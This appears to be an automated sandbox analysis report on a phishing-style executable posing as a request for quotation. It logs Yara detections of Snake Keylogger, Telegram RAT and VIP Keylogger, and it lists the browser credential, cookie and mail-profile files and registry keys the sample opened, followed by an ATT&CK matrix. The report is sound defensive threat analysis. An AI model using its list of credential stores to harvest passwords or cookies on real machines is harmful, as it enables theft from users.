Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Queries volume information: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Queries volume information: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Queries volume information: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 00000009.00000002.3829829868.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3830047300.0000000002821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 9.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.3824755853.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe PID: 2440, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe PID: 7264, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: NuDUTBObHpKADz.exe PID: 7636, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 9.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.3824755853.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe PID: 2440, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe PID: 7264, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match	File source: 9.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.3824755853.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3829829868.00000000031DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe PID: 2440, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe PID: 7264, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: NuDUTBObHpKADz.exe PID: 7636, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 00000009.00000002.3829829868.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3830047300.0000000002821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 9.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.3824755853.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe PID: 2440, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe PID: 7264, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: NuDUTBObHpKADz.exe PID: 7636, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 9.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.3824755853.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe PID: 2440, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe PID: 7264, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	2 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Windows Service	1 Windows Service	1 Deobfuscate/Decode Files or Information	LSASS Memory	13 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 Scheduled Task/Job	111 Process Injection	31 Obfuscated Files or Information	Security Account Manager	11 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
